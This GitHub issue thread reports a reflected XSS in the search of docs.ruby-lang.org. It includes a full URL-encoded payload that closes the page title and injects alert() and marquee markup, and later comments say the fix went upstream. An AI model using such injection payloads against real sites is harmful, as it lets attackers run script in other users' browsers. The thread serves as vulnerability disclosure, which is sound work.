### ISSUE TITLE
Reflected XSS

### ISSUE THREAD

**Issue by TheGirdap** [ruby/www.ruby-lang.org#1734]
Hello,

Reflected Xss found ..

https://docs.ruby-lang.org/ja/search/query:import/query:callback/%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D

result ;

 ss:

![ekran_resmi_2018-01-24_01 09 36 1](https://user-images.githubusercontent.com/35760403/35321952-9a3416dc-00f9-11e8-8b37-a2b19cd5a04d.png)

search:

search box > ....import+words+payload => reflected xss

https://twitter.com/hamit_cibo

**Comment by hsbt** [comment]
Please report an upstream repository: https://github.com/clear-code/rurema-search

**Comment by TheGirdap** [comment]
What! I did not understand !

**Comment by stomar** [comment]
Fixed, see clear-code/rurema-search#27.
